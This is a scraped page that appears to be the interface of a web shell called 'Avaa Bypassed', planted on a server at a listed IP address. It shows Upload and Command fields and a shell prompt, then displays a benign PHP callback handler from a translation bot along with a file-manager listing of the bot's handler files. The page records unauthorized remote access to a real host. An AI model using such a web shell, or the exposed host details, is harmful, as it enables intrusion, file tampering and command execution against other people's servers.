404

[ Avaa Bypassed ]




Upload:

Command:

botdev@18.191.66.218: ~ $
<?php
class NotFoundCallbackHandler extends CallBackhandler {
    function execute() {
        $data = $this->data;
        // $this->getTG()->sendMessageLog(
        //     "call back not found with action key ".$this->actionKey." with data : ".$data);
    }
    public function getParent() : EvaluationSystem{
        return parent::getParent();
    }
    public function getTG() : TranslateGerman {
        return parent::getSM();
    }
    public function isFound(){
        return false;
    }
    

}
?>

Filemanager

Name Type Size Permission Actions
learn Folder 0755
DeDeTextTranslateCallbackHandler.class.php File 2.7 KB 0644
DeFaTextTranslateCallbackHandler.class.php File 2.71 KB 0644
DislikeWordCallbackHandler.class.php File 1.55 KB 0644
FaDeTextTranslateCallbackHandler.class.php File 2.71 KB 0644
LikeWordCallbackHandler.class.php File 1.53 KB 0644
NextWordCallbackHandler.class.php File 2.61 KB 0644
NotFoundCallbackHandler.class.php File 509 B 0644
PrevWordCallbackHandler.class.php File 2.36 KB 0644
ReportCallbackHandler.class.php File 1.21 KB 0644
UserWantsEvaluateCallbackHandler.class.php File 1.96 KB 0644